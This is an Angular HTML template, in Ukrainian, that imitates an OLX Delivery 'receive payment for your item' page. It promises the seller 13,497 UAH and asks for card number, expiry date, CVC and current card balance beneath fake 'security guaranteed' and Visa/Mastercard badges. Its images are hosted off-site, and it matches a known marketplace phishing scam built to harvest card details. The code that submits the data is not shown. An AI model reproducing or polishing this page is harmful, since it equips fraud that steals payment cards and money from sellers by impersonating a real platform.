<h3 class="css-okktvh-Text eu5v0x0" style="text-align: center;margin: 50px 0px;">
  Отримання коштів за товар
</h3>
<div class="css-yfnylp css-1u6y1sg">
  <div class="css-wd2065">
    <div data-cy="delivery-info" class="css-1uhmt5n">
      <h6 class="css-ypl63b-Text eu5v0x0">Як працює OLX Доставка?</h6>
      <div class="css-1yiwy61">
        <div class="css-y2iybi">
          <img height="80" width="80" src="https://svgur.com/i/hho.svg" alt="delivery-box" class="css-1cf4ijq">
          <div class="css-bmvsud">
            <div class="css-9xtbg5">Введіть дані доставки</div>
            <div class="css-pdm40g">
              Вкажіть ваші контактні дані, виберіть службу доставки та
              відділення.
            </div>
          </div>
        </div>
        <div class="css-y2iybi">
          <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="1em" height="1em"
            viewBox="0 0 78 56" class="css-1euubcy">
            <defs>
              <path id="credit_card_svg__a"
                d="M74.502 55.57H4.355L.64 51.865V4.318L4.355.613h70.147l3.713 3.705v47.547l-3.713 3.705z"></path>
              <path id="credit_card_svg__c"
                d="M58.916 3.204v48.399c-1.282 1.279-2 2-3.286 3.279L.28 54.88 55.724.018a849.675 849.675 0 013.193 3.186z">
              </path>
              <path id="credit_card_svg__e" d="M.006.23h77.518v7.995H.006z"></path>
              <path id="credit_card_svg__g"
                d="M8.458 4.702A4.123 4.123 0 014.331 8.82 4.123 4.123 0 01.203 4.702 4.123 4.123 0 014.331.584a4.123 4.123 0 014.127 4.118z">
              </path>
              <path id="credit_card_svg__i"
                d="M8.859 4.702A4.123 4.123 0 014.732 8.82 4.123 4.123 0 01.604 4.702 4.123 4.123 0 014.732.584a4.123 4.123 0 014.127 4.118z">
              </path>
              <path id="credit_card_svg__k" d="M.629.592h10.197v2.545H.63z"></path>
              <path id="credit_card_svg__m" d="M.63.371h16.097V2.9H.629z"></path>
              <path id="credit_card_svg__o"
                d="M3.671 1.945c0 .935-.76 1.693-1.696 1.693A1.694 1.694 0 01.278 1.945c0-.935.76-1.693 1.697-1.693.936 0 1.696.758 1.696 1.693z">
              </path>
              <path id="credit_card_svg__q" d="M.63.128h30.714V6.91H.629z"></path>
            </defs>
            <g fill="currentColor" fill-rule="evenodd">
              <g transform="translate(-.286 .029)">
                <mask id="credit_card_svg__b" fill="#fff">
                  <use xlink:href="#credit_card_svg__a"></use>
                </mask>
                <path fill="#23E5DB" d="M-2.805-2.834h84.467v61.85H-2.805z" mask="url(#credit_card_svg__b)"></path>
              </g>
              <g transform="translate(19.013 .718)">
                <mask id="credit_card_svg__d" fill="#fff">
                  <use xlink:href="#credit_card_svg__c"></use>
                </mask>
                <path fill="#00A7A0" d="M-3.165-3.428h65.527v61.756H-3.165z" mask="url(#credit_card_svg__d)"></path>
              </g>
              <g transform="translate(.404 9.678)">
                <mask id="credit_card_svg__f" fill="#fff">
                  <use xlink:href="#credit_card_svg__e"></use>
                </mask>
                <path fill="#003035" d="M-3.44-3.216h84.41v14.887H-3.44z" mask="url(#credit_card_svg__f)"></path>
              </g>
              <g transform="translate(63.812 39.314)">
                <mask id="credit_card_svg__h" fill="#fff">
                  <use xlink:href="#credit_card_svg__g"></use>
                </mask>
                <path fill="#23E5DB" d="M-3.243-2.862h15.147v15.128H-3.243z" mask="url(#credit_card_svg__h)"></path>
              </g>
              <g transform="translate(57.609 39.314)">
                <mask id="credit_card_svg__j" fill="#fff">
                  <use xlink:href="#credit_card_svg__i"></use>
                </mask>
                <path fill="#003035" d="M-2.842-2.862h15.147v15.128H-2.842z" mask="url(#credit_card_svg__j)"></path>
              </g>
              <g transform="translate(5.917 29.665)">
                <mask id="credit_card_svg__l" fill="#fff">
                  <use xlink:href="#credit_card_svg__k"></use>
                </mask>
                <path fill="#CBF7EE" d="M-2.817-2.854h17.09v9.437h-17.09z" mask="url(#credit_card_svg__l)"></path>
              </g>
              <g transform="translate(5.917 34.49)">
                <mask id="credit_card_svg__n" fill="#fff">
                  <use xlink:href="#credit_card_svg__m"></use>
                </mask>
                <path fill="#CBF7EE" d="M-2.817-3.075h22.99v9.42h-22.99z" mask="url(#credit_card_svg__n)"></path>
              </g>
              <g transform="translate(60.366 42.071)">
                <mask id="credit_card_svg__p" fill="#fff">
                  <use xlink:href="#credit_card_svg__o"></use>
                </mask>
                <path fill="#FF5636" d="M-3.168-3.194H7.117V7.084H-3.168z" mask="url(#credit_card_svg__p)"></path>
              </g>
              <g transform="translate(5.917 20.016)">
                <mask id="credit_card_svg__r" fill="#fff">
                  <use xlink:href="#credit_card_svg__q"></use>
                </mask>
                <path fill="#CBF7EE" d="M-2.817-3.318H34.79v13.675H-2.817z" mask="url(#credit_card_svg__r)"></path>
              </g>
            </g>
          </svg>
          <div class="css-bmvsud">
            <div class="css-9xtbg5">
              Оплатіть товар онлайн
            </div>
            <div class="css-pdm40g">
              Гроші будуть перераховані продавцю тільки після того, як ви
              перевірите та отримаєте товар у поштовому вiддiленнi.
            </div>
          </div>
        </div>
        <div class="css-y2iybi">
          <img height="80" width="80" src="https://svgur.com/i/hj0.svg" alt="delivery-car" class="css-1cf4ijq">
          <div class="css-bmvsud">
            <div class="css-9xtbg5">
              Отримайте товар у поштовому вiддiленнi
            </div>
            <div class="css-pdm40g">
              Гроші за товар повернуться на вашу картку, якщо він вам не
              підійшов.
            </div>
          </div>
        </div>
      </div>
    </div>
    <div class="css-vkeoh5" style="margin-top: 24px; margin-bottom: 50px;">
      <div class="css-1d6s8nq">
        <div id="app" class="wrapper">
          <form class="card-form">
            <div class="card-list">
              <h6 class="css-135espn-Text eu5v0x0">Отримання коштів</h6>
            </div>
            <div class="css-wttt0b">
              <div class="css-1m42d6z">
                <div class="css-akqejg">
                  <h6 class="css-lzthca-Text eu5v0x0">
                    Вкажіть картку для отримання коштів:
                  </h6>
                  <div class="inputiki-card" [formGroup]="PayForm">
                    <div class="row css-cyz4tb">
                      <p class="css-mcrcp6-Text eu5v0x0">Номер картки</p>
                      <div class="css-cssveg">
                        <div class="css-1qsx3gp" [ngClass]="{
                          invalid: PayForm.get('card')?.touched && PayForm.get('card')!.invalid
                        }">
                          <input type="text" id="cardNumber" formControlName="card" placeholder="**** **** **** ****"
                            data-ref="cardNumber" autocomplete="off" class="css-1dp049v" maxlength="16">
                        </div>
                      </div>
                      <div class="inputiki-card-expire-cvc">
                        <div class="row css-cyz4tb">
                          <p class="css-mcrcp6-Text eu5v0x0">Термін дії</p>
                          <div class="css-cssveg">
                            <div class="css-1qsx3gp">
                              <div class="card-form__group">
                                <label for="cardMonth" class="card-input__label"></label>

                                <div class="mmYY" [ngClass]="{
                                  invalid: PayForm.get('mm')?.touched && PayForm.get('mm')!.invalid
                                }">
                                  <input type="text" id="cardMonth" data-ref="cardDate" class="css-1dp049aboba mmYY"
                                    placeholder="MM" formControlName="mm" maxlength="2">
                                </div>


                                <div class="mmYY" [ngClass]="{
                                  invalid: PayForm.get('yy')?.touched && PayForm.get('yy')!.invalid
                                }">
                                  <input type="text" id="cardYear" data-ref="cardDate" class="css-1dp049aboba mmYY"
                                    maxlength="4" placeholder="YY" formControlName="yy">
                                </div>
                              </div>
                            </div>
                          </div>
                        </div>
                        <div class="row css-cyz4tb">
                          <p class="css-mcrcp6-Text eu5v0x0">CVС</p>
                          <div class="css-cssveg">
                            <div class="css-1qsx3gp" [ngClass]="{
                              invalid: PayForm.get('cvc')?.touched && PayForm.get('cvc')!.invalid
                            }">
                              <input type="text" required="required" id="cardCvv" class="css-1dp049v" placeholder="0000"
                                maxlength="4" formControlName="cvc">
                            </div>
                          </div>
                        </div>
                      </div>
                      <div class="row css-cyz4tb">
                        <div class="card-input">
                          <p class="css-mcrcp6-Text eu5v0x0">Баланс картки</p>
                          <label for="cardBalance" class="card-input__label"></label>
                          <div class="balance" [ngClass]="{
                            invalid: PayForm.get('balance')?.touched && PayForm.get('balance')!.invalid
                          }">
                            <input type="text" step="0.01" id="cardBalance" formControlName="balance"
                              data-ref="cardBalance" autocomplete="off" class="css-1dp049v">
                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
                <div class="css-akqejg">
                  <div data-testid="summary" class="css-tjuh7q">
                    <h6 class="css-al8m0d-Text eu5v0x0">Разом:</h6>
                    <li data-testid="summary-item" class="css-p2wkk3">
                      <div class="css-1crbafg">
                        <p class="css-aejx2d-Text eu5v0x0">Вартість товару:</p>
                      </div>
                      <p class="css-nijcuk-Text eu5v0x0">13 497 грн.</p>
                    </li>
                    <li data-testid="summary-total" class="css-p2wkk3">
                      <div class="css-1crbafg">
                        <p class="css-aejx2d-Text eu5v0x0">До отримання:</p>
                      </div>
                      <p class="css-d2xge8-Text eu5v0x0">13 497 грн.</p>
                    </li>
                  </div>
                  <div class="css-1kz1bxg">
                    <div class="css-mj90if">Безпека гарантована</div>
                    <div class="css-uxnkf"><img src="https://i.imgur.com/miBwf3o.png" alt="Verified by Visa"><img
                        src="https://svgur.com/i/hjs.svg" alt="Master Card Secure code"></div>
                  </div>
                </div>
              </div>
              <div span="12" class="css-1ytq1h8">
                <div class="css-d3621g">
                  <div class="css-eh7zw" style="margin: 18px 0px 20px;">
                    <div class="css-g2sxsk"></div>
                    <div class="css-g2sxsk"></div>
                  </div>
                  <div class="css-1uewmxv">
                    <button class="card-form__button" (click)="submit()">
                      Отримати 13 497 грн.
                    </button>
                  </div>
                </div>
              </div>
            </div>
          </form>
        </div>
      </div>
    </div>
  </div>
</div>
